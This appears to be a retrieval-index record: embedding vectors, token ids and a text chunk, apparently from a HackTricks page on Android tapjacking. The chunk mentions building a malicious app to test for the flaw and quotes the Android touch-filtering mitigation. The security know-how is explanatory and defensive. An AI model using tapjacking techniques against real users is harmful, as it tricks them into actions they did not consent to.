0.13435252010822296, -0.2176598161458969, 0.19275617599487305, 0.8699539303779602, -0.0729714184999466, -0.09882679581642151, 0.33725470304489136, -0.8976975083351135, 0.7478689551353455, 0.10945005714893341, -0.3536284267902374, 0.19312447309494019, 0.23706331849098206, -0.03161697834730148, 0.5654711723327637, -0.24223704636096954, 0.2030739039182663, -0.7702885866165161, -0.7630698680877686, 0.07192541658878326, 0.7076194882392883, 0.13118740916252136, 0.4114782512187958, -0.3477881848812103, 0.004381358623504639, 1.5073106288909912, 0.5766686201095581, 0.47118574380874634, -0.5273778438568115, -0.3814550042152405, 0.18145152926445007, 0.11117927730083466, 0.063417948782444, -0.04468302056193352, 0.9318828582763672, -0.45623573660850525, 0.19398994743824005, 0.12905798852443695, -0.4971647560596466, -0.4100407660007477, -0.2072792500257492, -0.46274587512016296, 0.2300344556570053, -0.28647327423095703, 0.28930458426475525, 0.9537972211837769, -0.45485424995422363, -0.9802610874176025, -0.76405930519104, -0.17978204786777496, -1.2250155210494995, -0.18148726224899292, -0.00744283152744174, -0.43626680970191956, 0.5997823476791382, -0.3233845829963684, -0.5768800377845764, 1.033608317375183, 0.31930050253868103, 0.30055126547813416, 0.4051832854747772, 0.3998284339904785, 0.39648863673210144, 0.2553766369819641, -0.5417528748512268, 0.14172466099262238, -0.029427535831928253, 0.4160396158695221, 0.3979191482067108, 0.2199697345495224, 0.2044830471277237, -0.4445722699165344, 0.22409048676490784, 1.0501048564910889, 0.16669555008411407, -0.12758396565914154, -0.704190194606781, -0.436646431684494, -0.02569805644452572, -0.43735790252685547, 0.28458598256111145, -0.1414594054222107, 0.16819186508655548, 0.264061838388443, 1.077157974243164, -0.013314819894731045, -0.8190099596977234, 0.018390534445643425, -0.03250151127576828, 0.5967886447906494, -0.6592424511909485, 0.32181280851364136, 1.485702633857727, 0.6656444668769836, 0.18452906608581543, 0.11391668021678925, -0.12921053171157837, -0.3809822201728821, -0.1458846479654312, -0.5073053240776062, 0.39837029576301575, -0.13539159297943115, 0.7920054197311401, 0.16394264996051788, 0.014544183388352394, -0.7692201137542725, -0.24929730594158173, 0.8802986741065979, 0.2468002438545227, -0.4231577515602112, -0.4324533939361572, -0.3815034329891205, -0.46072831749916077, -0.5659555196762085, -0.7927230000495911, 0.7394468784332275, 0.4316924512386322, 0.15965476632118225, 0.6917325854301453, -0.7849388122558594, -0.9472590088844299, -0.6627175211906433, -0.7220382690429688, -0.9040638208389282, -0.0642118901014328, -0.992819607257843, -0.10524241626262665, -0.668938934803009, -0.6403617262840271, 0.6218015551567078, -0.14905576407909393, -0.7538797855377197, 0.3396129608154297, 0.4123166799545288, 0.34313029050827026, -0.46985751390457153, -0.2748671770095825, -0.65633225440979, 0.2627764344215393, 0.40694934129714966, 0.22850851714611053, -0.09929835796356201, -0.2656150460243225, 0.14288535714149475, -0.33086681365966797, 0.5707908868789673, -0.3211537003517151, 0.5676476359367371, -0.03700191155076027, 0.2182060182094574, 0.501213014125824, 0.13830852508544922, -0.3764616847038269, 0.01746584288775921, 0.48063740134239197, -0.21117708086967468, 0.2250039279460907, 0.3421896696090698, 0.15433238446712494, 0.5371345281600952, 0.4276624619960785, -0.5709905028343201, 0.30468109250068665, 0.05625854432582855, 0.23870615661144257, -0.5059897303581238, 0.49315959215164185, 0.5281224846839905, -0.004619868006557226, 0.31824931502342224, -0.21687863767147064, 0.1849951595067978, -0.7726254463195801, -0.4750811457633972, 0.05804053321480751, 0.09267614781856537, 0.13080048561096191, -0.33941057324409485, -0.9800905585289001, 0.12861724197864532, 0.2699928879737854, 0.172720804810524, -0.6211259365081787, -0.5646201968193054, 1.273966908454895, 0.605251133441925, -0.01348000019788742, 0.22796255350112915, -0.27169668674468994, -0.17019934952259064, 0.1995823085308075, -0.5265498161315918, -0.37348973751068115, 0.5403750538825989, 0.24226997792720795, -0.2550433576107025, 0.751907229423523, 0.3338964283466339, -0.36158645153045654, 0.2997312545776367, -0.5115050673484802, -0.8663654327392578, -0.47950419783592224, 0.1231001615524292, -0.4791989326477051, 0.23688262701034546, 0.7135940790176392, -0.24104352295398712, -0.1479124277830124, 0.22924374043941498, -0.1401004195213318, 0.8742734789848328, 0.015288006514310837, -0.0223277285695076, 0.44977766275405884, -0.265987366437912, 0.09786202013492584, -0.07830196619033813, 0.2953915596008301, 0.2893901467323303, 0.1899106502532959, 1.00551438331604, -0.19980290532112122, 0.10103758424520493, 0.48296958208084106, -0.4284663498401642, -1.3058595657348633, 1.0679311752319336, 0.06432483345270157, -0.15796130895614624, -0.2581436038017273, -0.19923527538776398, 0.2479865700006485, 0.3171337842941284, 0.09716726094484329, 0.27754220366477966, -0.29237860441207886, -0.16139434278011322, -0.23662851750850677, 0.007664510048925877, 0.04826837778091431, -0.15461909770965576, 0.6643297076225281, 0.44400134682655334, -0.043641045689582825, -1.0971955060958862, -0.34614938497543335, -0.36824145913124084, 0.9349114894866943, 1.0719259977340698, -0.3085196614265442, 1.241223931312561, -0.04845816642045975, -0.06685024499893188, 0.46814313530921936, -1.0281482934951782, -0.2598108947277069, -0.35804474353790283, 0.2814652621746063, -0.2340749353170395, -0.08882422000169754, -0.3189535140991211, 0.009202230721712112, -0.20777657628059387, -0.023195888847112656, 0.33364853262901306, -0.4011233448982239, -0.3967741131782532, -0.33321326971054077, 0.0692741796374321, -0.33402812480926514, 0.07259300351142883, 0.1508314162492752, -0.13940304517745972, 0.3667311668395996, 0.8321369290351868, -0.19943685829639435, 0.14652971923351288, -0.8476388454437256, 0.04908444359898567, -0.2971589267253876, -0.11724705249071121, -0.5025389790534973, -0.2357690930366516, -0.7499096393585205, -0.561707615852356, 0.17395736277103424, 0.49556177854537964, 0.4683634340763092, 0.5802654027938843, -1.0456950664520264, 0.06853842735290527, 0.44807714223861694, -0.605032205581665, -0.7856876850128174, -0.6467741131782532, 0.08549506217241287, 0.7641591429710388, 0.27806130051612854, -0.5243350863456726, -0.1925196796655655, 0.16062168776988983, -0.4182070195674896, 0.9913280010223389, -0.6300559639930725, 0.11900597810745239, 0.4395803213119507, -0.16900886595249176, -0.6633610725402832, 0.20004713535308838, -0.5235440731048584, 0.24651364982128143, -0.192980095744133, 0.4197702407836914, -0.14391601085662842, -0.3844616115093231, 0.32397669553756714, 0.3365582227706909, 0.44294407963752747, -0.32642117142677307, -0.04742574691772461, 0.006014835089445114, 0.2583537995815277, -0.3270634710788727, -0.6050872802734375, 0.4838499426841736, -0.6967648267745972, 0.6248008012771606, 0.6235083341598511, 0.2503821551799774, 0.08966096490621567, -1.1072627305984497, 0.38960030674934387, 0.8715496063232422, -0.2238704264163971, -0.7615777850151062, -0.2608201205730438, 0.19774261116981506, 0.3044423758983612, 0.337870717048645, 1.1894699335098267, 0.6978653073310852, 0.3299807906150818, 0.5175324082374573, 0.31019601225852966, -0.418169766664505, -0.4855082631111145, -0.3973039388656616, 0.4213954210281372, 0.274448961019516, -0.37489524483680725, 0.17512571811676025, -0.17427456378936768, -0.2219758927822113, 0.07136830687522888, -0.4242691993713379, -0.4362281560897827, -0.6974318027496338, 0.2456771284341812, -0.16648226976394653, 0.254565566778183, -0.4163018763065338, 0.29289960861206055, -0.32088905572891235, -0.1324434131383896, 0.47964680194854736, 0.2709961235523224, 0.32035791873931885, -0.42620477080345154, -0.3406519889831543, 0.33187857270240784, -0.18663077056407928, 0.16680321097373962, -0.10708204656839371, 0.16321472823619843, -0.6113165020942688, -0.40683507919311523, -0.2747187614440918, -0.6603999137878418, -1.2714699506759644, -1.1526979207992554, 0.2455912083387375, -0.7438862919807434, 0.026114540174603462, -0.790000319480896, -0.3951137959957123, -0.23195494711399078, 0.9089841842651367, -0.0939817950129509, 0.17577077448368073, 0.2594282627105713, -0.1791989654302597, 0.3643208146095276, 0.18724483251571655, 0.061178285628557205, 0.3564792275428772, -0.3773604929447174, 0.1700347661972046, 0.8413434624671936, 0.7399888634681702, 0.17237602174282074, 0.11162099242210388, -0.1684245765209198, 0.6182754635810852, 0.6465688347816467, -0.260515958070755, -0.17616726458072662, -0.1561543047428131, -0.05035391449928284, -0.7353053689002991, 0.7085158228874207, -0.8269590139389038, 0.6484158635139465, 0.11640148609876633, 0.16139641404151917, 0.2862897217273712, 0.22327014803886414, -0.4489971697330475, -0.19640378654003143, 0.307445228099823, -0.3042498528957367, -0.13865555822849274, 0.05348842963576317, 0.5827097296714783, 0.24904456734657288, 0.1420183628797531, -0.601679801940918, 0.17089411616325378, -0.797369658946991, -1.1022932529449463, 0.7429734468460083, 0.04661673679947853, -0.003992422949522734, -0.1803990602493286, -0.8177034854888916, 0.23991183936595917, -0.3253554403781891, 0.02985365316271782, 0.7522472143173218, -0.014078577980399132, -0.3693888187408447, 0.290223091840744, -0.030269680544734, 0.6711792945861816, -0.2302749752998352, -0.035036601126194, -0.09465014189481735, 0.05433809384703636, -0.4024748206138611, -0.5402466058731079, -0.44041576981544495, -0.20826341211795807, -0.07993819564580917, -0.5421600937843323, -0.280966579914093, 0.7271619439125061, -0.7271796464920044, -0.49887511134147644, -0.2937896251678467, -0.07491608709096909, 0.04016118496656418, -0.15053421258926392, 0.6112492680549622, 0.9215644001960754, 0.4949050843715668, 0.28559523820877075, 0.18331092596054077, -0.0293257012963295, -0.4005885422229767, 0.9002736210823059, -0.04039563611149788, -0.84554523229599, 0.6025795936584473, 0.45663151144981384, -0.5973666310310364, -0.4234527051448822, -0.6165758371353149, -0.7978933453559875, -0.42113038897514343, 0.3668113946914673, -0.671038806438446, -0.6846709251403809, -0.005269823130220175, -0.1862795054912567, 0.7064751982688904, 0.18946599960327148, -0.3223945200443268, -0.5758143067359924, 0.7322682738304138, 0.19443224370479584, 0.3555760681629181, 0.5093249082565308, 0.26545250415802, -0.22725285589694977, -0.8629353046417236, 0.056234702467918396, -0.14480188488960266, 0.02385643497109413, 1.392709493637085, -0.013252897188067436, -0.10854457318782806, -0.14798562228679657, -0.12300296872854233, 0.7312308549880981, -0.02287989668548107, 0.39836323261260986, 0.701801598072052, -0.010177047923207283, -0.6630867123603821, -0.8471919894218445, -0.30638986825942993, 0.22746136784553528, 0.5001444816589355, -0.5928738117218018, -0.4389759600162506, 0.57365483045578, -0.2233496904373169, 0.11985509842634201, -0.6732404232025146, -0.7674353122711182, -0.9474107623100281, -0.11188409477472305, -0.01186677161604166, -0.12066200375556946, -0.029299169778823853, 0.4515623450279236, -0.5792942047119141, -0.8969843983650208, 0.10378190875053406, 0.349687397480011, 0.03154968470335007, -0.14704841375350952, -0.7937856912612915, 0.6804060339927673, -0.9294103980064392, -0.43845635652542114, -0.3001881241798401, -0.6563876271247864, 0.23050916194915771, -0.766923189163208, 0.37049219012260437, 0.11890911310911179, -0.8315169811248779, 0.1740170568227768, -0.31640633940696716, -0.02371923066675663, -0.021859578788280487, -0.2532961964607239, -0.4274955987930298, 0.4685983955860138, -0.3915490210056305, 0.14989320933818817, -0.40687957406044006, 0.23953649401664734, 0.23567968606948853, -0.11760368943214417, -0.1161491796374321, 0.01539516169577837, 0.23243235051631927, -0.08225925266742706, 0.6237069964408875, -0.19706109166145325, 0.5616145730018616, 0.03404717519879341, -0.14831985533237457, -0.33007171750068665, -0.6228920817375183, -0.6530499458312988, -0.21458832919597626, -0.32762789726257324, 0.28317704796791077, -0.16988694667816162, 0.269235759973526, 0.874244213104248, -0.5964248180389404, 1.0932320356369019, -0.13455279171466827, 0.4572148323059082, 0.8726552128791809, -0.2572079300880432, 0.005291728302836418, 0.29634764790534973, 0.11884807050228119, 0.39001426100730896, 0.3501940965652466, 0.2821929156780243, 0.030182600021362305, -0.44119760394096375, -0.5342541337013245, -0.1621096432209015, 0.43787723779678345, 0.3740108907222748, 0.21810781955718994, 0.12984099984169006, 0.15225379168987274, -0.46309611201286316, -1.0244766473770142, -0.11772223562002182, -0.7544692754745483, 0.4618036150932312, 0.10100974887609482, -0.025741007179021835, -0.6254082918167114, -0.2894384562969208, 0.4000397026538849, 0.02179369330406189, 0.398171991109848, -0.48303619027137756, 0.491790771484375, 0.13955053687095642, 0.648551344871521, 1.3748911619186401, -0.3384198546409607, 0.30719777941703796, -0.8600520491600037, -0.06458260864019394, -0.17264768481254578, -0.8428015112876892, -0.10926657915115356, 1.0859569311141968, 0.19189421832561493, -0.5764129757881165, -0.41391459107398987, -0.5193929076194763, 0.5400423407554626, -0.46729257702827454, 0.43082156777381897, 0.5013325214385986, -0.9776183366775513, 0.4631192088127136, -0.14960207045078278, 0.04422549903392792, 0.5287068486213684, -0.2675042152404785, 0.059543248265981674, -0.16173155605793, -0.4115907549858093, -0.025360211730003357, 0.584968626499176, 0.3075386881828308, 1.108299732208252, 0.5549611449241638, 0.5897529721260071, -0.8798049688339233, 0.47295451164245605, -0.09252709150314331, 0.1950731724500656, 0.1556548923254013, 0.3793727457523346, 0.06555989384651184, -0.028870949521660805, 0.01652892678976059, -0.1809314787387848, 0.09075946360826492, 0.33563295006752014, -0.4549466073513031, -0.3202000856399536, -0.05795442685484886, -0.30144187808036804, -0.0034765365999192, -0.2638857960700989, -0.7042534351348877, -0.31011468172073364, -0.3428694009780884, 0.3717193305492401, 0.3714756965637207, -0.24220988154411316, 0.7319455742835999, -1.1400164365768433, 0.40204352140426636, 0.008271007798612118, 0.09783649444580078, 0.7693976163864136, -0.07486236095428467, -0.9632111191749573, 0.27213072776794434, 0.11845554411411285, -0.009166533127427101, -0.6734632253646851, 0.9277457594871521, 0.0581960491836071, 0.22152940928936005, -0.2563093900680542, 0.07770626246929169, -0.46852776408195496, -0.2626575231552124, 0.8311908841133118, -0.6393834352493286, -0.5132549405097961, 0.23595045506954193, 0.13038146495819092, -0.10279938578605652, 0.2666091322898865, -0.4914557933807373, 0.1296086460351944, -0.03911522030830383, -0.22635304927825928, -0.19552265107631683, -0.8293541073799133, 0.29941266775131226, -0.5196475982666016, -0.1668626219034195, 0.6082794070243835, -0.3909704089164734, 0.48688140511512756, -0.45202240347862244, 0.716231644153595, -0.36409008502960205, 0.4987664222717285, -0.31749290227890015, -0.5283193588256836, -0.6299920678138733, -0.5606970191001892, -0.19118613004684448, -0.4116617739200592, -0.42398524284362793, 0.17510412633419037, 1.049672245979309, 0.17888765037059784, -0.866711437702179, -0.5786296129226685, 0.25086331367492676, -0.2265971302986145, -0.7634745836257935, 0.40062493085861206, 0.5225290656089783, -0.33386626839637756, -0.4467411935329437, 0.058439552783966064, 0.5299737453460693, 0.19723957777023315, -0.3016502261161804, -0.03223299980163574, -0.48163560032844543, 0.2010737508535385, -0.6153624057769775, 0.6172235608100891, -0.07433415204286575, -0.6210334897041321, 0.3881382346153259, -1.3889954090118408, 0.025420356541872025, 0.21067310869693756, 0.35531607270240784, -0.30331796407699585, 0.49018165469169617, 0.35680148005485535, -0.15479537844657898, 0.547177255153656, -0.7699474096298218, -0.06364082545042038, 0.2287113517522812, 0.5848199725151062, -0.4841174781322479, 0.2813422977924347, -0.19810564815998077, 0.20434722304344177, 0.25570207834243774, -0.15495628118515015, 0.3945152163505554, 0.13604538142681122, 0.28001460433006287, 0.31601482629776, -0.05118917301297188, -0.6810866594314575, 0.10811761766672134, 0.9887257218360901, -0.537230372428894, -0.12051297724246979, 0.262970894575119, -0.5937204360961914, -0.19087816774845123, -0.6293733716011047, 0.40385523438453674, 0.39247894287109375, -0.3562256395816803, -0.2716618776321411, 0.22875429689884186, 0.8930538892745972, -0.5555726885795593, 4.324245452880859, 0.23430894315242767, -0.3789524734020233, -0.2100973129272461, 0.19126400351524353, 0.3201730251312256, 0.6094872951507568, -0.9791945219039917, 0.47492608428001404, 0.23163101077079773, 0.7601951956748962, -0.6274566054344177, 1.1399567127227783, 0.39049625396728516, 0.11987018585205078, 0.26412126421928406, -0.3207390606403351, 0.13054297864437103, 0.8091385960578918, -1.2968965768814087, -0.18367457389831543, 0.46591895818710327, 0.06552569568157196, 0.554128110408783, 0.5966964960098267, 0.7429875731468201, 0.315859854221344, 0.008913866244256496, -0.5962480902671814, -0.028551463037729263, 0.03690090402960777, -0.5037723779678345, 0.10138208419084549, -0.5986147522926331, 0.1150364801287651, 0.17155596613883972, -0.021250732243061066, -1.2364089488983154, -0.4809064567089081, 0.15802998840808868, 0.20082712173461914, 0.3567940890789032, -0.3124788999557495, -0.26094192266464233, 0.08493736386299133, 0.5260128378868103, 0.019332105293869972, -0.08104821294546127, 0.6535676717758179, -0.9660500884056091, 0.49714744091033936, -0.480625718832016, 1.1740564107894897, 0.19088852405548096, -0.16320250928401947, -0.0007077637710608542, 0.2886078953742981, -0.32104724645614624, 0.38657140731811523, -0.02798483334481716, 0.7636038064956665, -0.7231685519218445, 0.019722819328308105, -0.4640359878540039, -0.9828450083732605, 0.3475479781627655, -0.6619037389755249, 0.05243600904941559, 0.12531784176826477, -0.1562339812517166, -0.6421821713447571, -0.5799160003662109, -0.4647439420223236, 0.21278971433639526, 0.6940298676490784, 0.17242972552776337, 0.9115180969238281, 0.3712692856788635, 0.16658170521259308, -0.1932300627231598, -0.403398722410202, -0.41542014479637146, -0.6784132719039917, 0.6818837523460388, 0.9361700415611267, 0.5456767678260803, -0.30880630016326904, -0.5135455131530762, -0.0795125663280487, 0.17252445220947266, 0.2639148533344269, 0.1350587010383606, 0.1309460550546646, -0.23527251183986664, 0.5279236435890198 ]
[ 101, 11112, 17364, 2075, 22083, 2594, 2592, 2696, 2361, 17364, 2075, 2003, 2019, 2886, 2073, 1037, 24391, 4646, 2003, 3390, 1998, 4460, 2993, 2006, 2327, 1997, 1037, 6778, 4646, 1012, 2320, 2009, 19397, 14485, 2015, 1996, 6778, 10439, 1010, 2049, 5310, 8278, 2003, 2881, 1999, 2107, 1037, 2126, 2004, 2000, 7577, 1996, 5310, 2000, 11835, 2007, 2009, 1010, 2096, 2009, 2003, 4458, 1996, 8290, 2247, 2000, 1996, 6778, 10439, 1012, 1999, 3466, 1010, 2009, 2003, 19709, 1996, 5310, 2013, 4209, 2027, 2024, 2941, 4488, 4506, 2006, 1996, 6778, 10439, 1012, 10788, 2378, 2344, 2000, 11487, 18726, 8211, 2000, 2023, 4457, 2017, 2323, 3945, 2005, 15612, 3450, 1999, 1996, 11924, 19676, 1006, 3602, 2008, 2019, 4023, 2007, 2019, 7848, 1011, 11307, 2003, 8073, 15612, 2011, 12398, 1007, 1012, 2320, 2017, 2031, 2179, 1996, 15612, 3450, 1010, 4638, 2065, 2027, 5478, 2151, 6656, 1012, 2023, 2003, 2138, 1996, 24391, 4646, 2097, 2342, 2008, 6656, 2036, 1012, 3860, 5685, 22943, 2260, 1006, 17928, 2861, 1010, 3590, 1007, 1998, 3020, 6305, 27108, 4667, 2000, 2023, 3120, 1010, 11112, 17364, 2075, 4491, 2024, 8073, 8729, 2011, 11924, 2013, 11924, 2260, 1006, 17928, 2861, 1004, 2382, 1007, 1998, 3020, 1012, 2061, 1010, 2130, 2065, 1996, 4646, 2003, 8211, 2017, 2180, 1005, 1056, 2022, 2583, 2000, 18077, 2009, 1012, 11307, 24826, 8376, 2860, 10222, 16429, 28817, 5596, 10128, 11924, 1024, 11307, 24826, 8376, 2860, 10222, 16429, 28817, 5596, 2003, 2275, 2000, 2995, 1010, 1996, 3193, 2097, 2025, 4374, 12817, 7188, 3193, 1005, 1055, 3332, 2003, 23649, 2011, 2178, 5710, 3332, 1012, 2275, 8873, 21928, 24826, 8376, 2860, 10222, 16429, 28817, 5596, 10760, 17961, 2275, 8873, 21928, 24826, 8376, 2860, 10222, 16429, 28817, 5596, 2275, 2000, 2995, 2064, 2036, 4652, 1996, 14427, 1997, 2023, 18130, 2065, 1996, 11924, 2544, 2003, 2896, 1012, 2065, 2275, 2000, 2995, 1010, 2005, 2742, 1010, 1037, 6462, 2064, 2022, 8073, 9776, 2065, 2009, 2003, 23649, 1024, 1026, 6462, 11924, 1024, 3793, 1027, 1000, 6462, 1000, 11924, 1024, 8909, 1027, 1000, 1030, 1009, 8909, 1013, 6462, 2487, 1000, 11924, 1024, 9621, 1035, 9381, 1027, 1000, 10236, 1035, 4180, 1000, 11924, 1024, 9621, 1035, 4578, 1027, 1000, 10236, 1035, 4180, 1000, 11924, 1024, 11307, 24826, 8376, 2860, 10222, 16429, 28817, 5596, 1027, 1000, 2995, 1000, 1028, 1026, 1013, 6462, 1028, 14427, 2696, 2361, 17364, 2075, 1011, 15612, 18908, 7730, 10760, 2087, 3522, 11924, 4646, 4488, 1037, 11112, 17364, 2075, 2886, 1006, 1009, 1999, 22776, 2077, 2019, 15612, 4023, 1997, 1996, 4457, 4646, 1007, 2064, 2022, 2179, 1999, 24471, 2140, 1996, 3191, 4168, 8128, 2000, 2224, 2009, 1012, 8274, 11101, 21293, 13944, 2078, 2742, 2622, 14972, 8274, 11101, 21293, 9397, 1010, 2029, 2064, 2022, 2109, 2000, 2404, 2006, 2327, 1997, 2060, 3450, 2000, 4685, 1037, 11562, 17364, 2075, 2886, 1010, 2064, 2022, 4636, 1999, 8274, 11101, 21293, 9397, 1006, 1037, 2978, 2214, 1010, 2204, 6735, 2311, 1996, 9706, 2243, 1007, 1012, 1053, 17007, 4183, 3504, 2066, 2023, 2622, 2003, 2085, 4895, 24238, 28055, 1998, 2023, 15380, 3475, 1005, 1056, 7919, 2551, 4902, 29337, 2064, 2224, 1053, 17007, 2007, 1996, 1011, 1011, 18077, 1011, 9706, 2243, 1011, 1011, 17371 ]
hack_tricks
426.txt
0
##k - path / users / username / library / android / sdk parameters to create a malicious application to test for possible tapjacking vulnerabilities. the mitigation is relatively simple as the developer may choose not to receive touch events when a view is covered by another. using the android developer ’ s reference : sometimes it is essential that an application be able to verify that an action is being performed with the full knowledge and consent of the user, such as granting a permission request, making a purchase or clicking on an advertisement. unfortunately, a malicious application could try to spoof the user into performing these actions, unaware, by concealing the intended purpose of the view. as a remedy, the framework offers a touch filtering mechanism that can be used to improve the security of views that provide access to sensitive functionality. to enable touch filtering, call setfiltertoucheswhenobscured ( boolean ) or set the android : filtertoucheswhenobscured layout attribute to true. when enabled, the framework will discard touches that are received whenever the view's window is obscured by another visible window. as a result, the view will not receive touches whenever a toast, dialog or other window appears above the view's window. [SEP]
[ -0.09809505939483643, 0.09708856046199799, -0.4967486262321472, 0.5358961820602417, -0.4089282751083374, -0.18125545978546143, -0.32118892669677734, -0.06991835683584213, 0.0766816958785057, 0.8010491728782654, -0.20859332382678986, 0.011698111891746521, 0.8064215779304504, -0.015981400385499, -0.9042444229125977, -0.17260299623012543, -0.64339679479599, 0.16076849400997162, -0.30819517374038696, -0.3033291697502136, 0.3553798496723175, 0.6219714283943176, -0.6207038164138794, -0.8709281086921692, -0.7620598077774048, -0.17624197900295258, 0.20064498484134674, -0.44002652168273926, 0.6299232244491577, 0.882005512714386, -0.3487880229949951, 0.270447701215744, 0.3291572034358978, -0.061942387372255325, -0.01787116564810276, -0.4890841841697693, 0.9819210171699524, -0.19746047258377075, -0.2550896108150482, -0.5318911671638489, 0.8076171278953552, 0.3625502288341522, 1.031213402748108, -0.9209612607955933, -0.164781853556633, -0.08320742845535278, -0.7163567543029785, -0.4092053771018982, -0.22975099086761475, -0.2708898186683655, -0.5994043946266174, 0.3447663486003876, -0.16013860702514648, -0.21678361296653748, -0.3228945732116699, 0.15846595168113708, -0.4424445629119873, -0.492885947227478, -0.20969673991203308, 0.5470737218856812, -0.576119065284729, 0.4076230227947235, 0.012531611137092113, -0.959365963935852, 0.6215891242027283, 0.4624832570552826, -0.6999986171722412, -0.5000215768814087, -0.03786445036530495, -0.5117518901824951, -0.22168700397014618, 0.040682245045900345, -0.81675785779953, -0.7449396848678589, 0.04786081239581108, 0.31485113501548767, -0.2770862281322479, -0.13019108772277832, 0.47091051936149597, 1.2967290878295898, -0.1529565155506134, 0.9137388467788696, 0.2591440975666046, 0.3529771864414215, -0.5298453569412231, -0.31533437967300415, 0.3847464621067047, -0.058977436274290085, -0.5134885907173157, -0.47748640179634094, 0.11360818147659302, 0.8433082103729248, 0.4415324926376343, -0.40286242961883545, -0.29475751519203186, -0.11952466517686844, -0.16419772803783417, 1.099740982055664, 0.9380157589912415, 0.1321728378534317, 0.17947567999362946, 0.15613362193107605, 0.02310601808130741, 0.25408512353897095, 0.09503883123397827, 0.38150572776794434, 0.16444449126720428, 0.12893398106098175, -0.5196241140365601, -0.885383665561676, 0.023628514260053635, 0.045914988964796066, -0.5157234072685242, -0.16601254045963287, -0.23836499452590942, -0.23625992238521576, 0.4346316158771515, 0.3499628007411957, -0.6613786816596985, 0.0641835406422615, 0.07314836233854294, -0.4352262318134308, 0.8620172142982483, 0.02081119269132614, 0.0836368054151535, 0.041583020240068436, 0.18188071250915527, 0.3739248812198639, -0.425688773393631, 0.025204017758369446, 0.24886055290699005, -0.1273658573627472, 0.18134400248527527, 0.9660464525222778, -0.5632882714271545, -0.5177510380744934, 0.3669096529483795, -0.07345650345087051, 0.10218502581119537, -0.6573861241340637, -0.18524926900863647, -0.13748227059841156, -0.45991915464401245, 0.9711318016052246, -0.4116126000881195, -0.04035317897796631, 0.029735593125224113, 0.8204486966133118, -0.4847107529640198, -0.07988288253545761, -0.33482804894447327, 0.5802221298217773, 0.49639686942100525, 0.3022971749305725, 0.49590957164764404, 0.0056459177285432816, -0.5858187675476074, -0.014489364810287952, 0.522668719291687, 0.49609991908073425, -0.3959426283836365, 0.3327426314353943, -0.7307742238044739, 0.8787667751312256, 0.07537887245416641, 0.3195541501045227, -1.0287256240844727, -0.3729749619960785, 0.5427612662315369, -0.4028761386871338, 0.4018046259880066, 0.13682083785533905, -0.2627166509628296, 0.5389140844345093, 1.2034260034561157, -0.07833871990442276, 0.5061341524124146, -0.4743030071258545, -0.1366731971502304, 0.5215842723846436, 0.504189133644104, 0.1947328746318817, 0.5415958762168884, 0.8258683681488037, 0.19803042709827423, -0.21760180592536926, -0.3698252737522125, -0.15688328444957733, -0.4800853729248047, -0.14140459895133972, 0.17453882098197937, 0.18316107988357544, -0.060123804956674576, 0.1765775978565216, 0.24003373086452484, -0.33243516087532043, -0.9681824445724487, -0.4361967444419861, 0.2974816858768463, -1.188702940940857, 0.14395257830619812, -0.09130286425352097, -0.7647665143013, 0.6068783402442932, -0.009549477137625217, -0.6297171115875244, 0.5498397350311279, 0.34970998764038086, -0.7621012330055237, 0.42840802669525146, -0.2058686912059784, -0.02620883472263813, -0.7133582830429077, -0.18613885343074799, 0.7390260100364685, -0.6907702088356018, 0.5372402667999268, 0.09192147850990295, -0.03645627573132515, 0.6527687907218933, -0.2166603058576584, -0.01972954347729683, 0.8298686146736145, 0.6030049920082092, -1.0403071641921997, 0.10003897547721863, 0.08323902636766434, 0.48482367396354675, 0.30221158266067505, 0.26652103662490845, -0.1793304830789566, 0.13295254111289978, 0.15091386437416077, 0.5871989130973816, 0.5809360146522522, 0.19765758514404297, -0.40028291940689087, -0.48021021485328674, 0.3384210169315338, 0.02864122949540615, 0.004931190982460976, 1.1828694343566895, 0.19597642123699188, 0.48589229583740234, -0.3132537007331848, -0.37065979838371277, 0.031531307846307755, -0.031061314046382904, -0.583057165145874, -0.17773498594760895, -0.7106387615203857, 1.004804253578186, 0.24781833589076996, 0.19322684407234192, -0.6355146169662476, -0.12280498445034027, 0.2855849266052246, -0.22524014115333557, -0.16314467787742615, -0.3760465681552887, 0.1592351347208023, 0.1194940134882927, -0.004648149013519287, -0.8577760457992554, 0.5644317269325256, 0.6130933165550232, 1.1231014728546143, 0.6187868118286133, -0.5397619605064392, -0.8806049227714539, -0.26636412739753723, -0.9062515497207642, -1.066437840461731, 0.36438894271850586, -1.03663170337677, -0.5008438229560852, 0.09817468374967575, -1.222996473312378, 0.6729021668434143, -0.13179846107959747, -0.24211379885673523, -0.042480673640966415, 0.15716813504695892, 0.05587691068649292, -0.09708524495363235, 0.11652889847755432, -0.42119795083999634, -0.19455155730247498, 0.38176584243774414, -0.004414459224790335, 0.006627151742577553, -0.2566518187522888, -0.13372153043746948, -0.0701720118522644, 0.7359111905097961, -0.594726026058197, -0.07988801598548889, 0.27726316452026367, -0.03143078461289406, 0.5220240354537964, -0.3620969355106354, -0.16878940165042877, -0.21788904070854187, 0.43204551935195923, -0.48352378606796265, 0.7050507664680481, 0.6664862632751465, -0.430702269077301, 0.5303876996040344, 0.5546945333480835, -0.08463724702596664, 0.23166094720363617, -0.2599766254425049, -0.2347118854522705, -0.5231845378875732, 0.20362232625484467, 0.6731150150299072, -0.23229826986789703, -0.058114100247621536, -0.30088379979133606, -0.37074014544487, -0.7307320237159729, -0.31618747115135193, -0.4136105477809906, -0.6921442151069641, 0.5695457458496094, -0.3298989236354828, -0.7622535824775696, -0.19358055293560028, -0.2588227093219757, 0.14160345494747162, -1.0179121494293213, -0.610605776309967, 0.8651968836784363, 0.6562666296958923, 0.27852532267570496, 0.3367598056793213, -0.23238299787044525, 0.5659752488136292, -0.07150059938430786, 0.14649662375450134, -0.46825313568115234, 0.16518865525722504, 0.08228585869073868, 0.4178718328475952, -0.19465184211730957, -0.11572705954313278, -0.8592934012413025, 0.3015880286693573, -0.43075647950172424, -0.44275832176208496, 0.11279957741498947, -0.0320112481713295, -0.2993999421596527, 0.6886846423149109, 0.9360666275024414, -0.9132519364356995, 0.10149728506803513, 0.10720552504062653, -0.20777733623981476, 0.4231894016265869, -0.1016119122505188, -0.4132043421268463, 0.3315655291080475, -0.2266358882188797, -0.30201151967048645, 0.06495418399572372, 0.6356801986694336, 0.8983956575393677, -0.21457885205745697, 0.34699514508247375, -0.22493621706962585, -0.27050134539604187, 0.43872302770614624, -0.5451914668083191, -0.2965337634086609, 1.0137412548065186, 0.004208953585475683, 0.6703993678092957, -0.23229262232780457, -0.06328625231981277, 0.19023698568344116, 0.61107337474823, 0.5795128345489502, -0.27073419094085693, -0.4724641442298889, -0.28049755096435547, -0.2453767955303192, -0.11782228946685791, 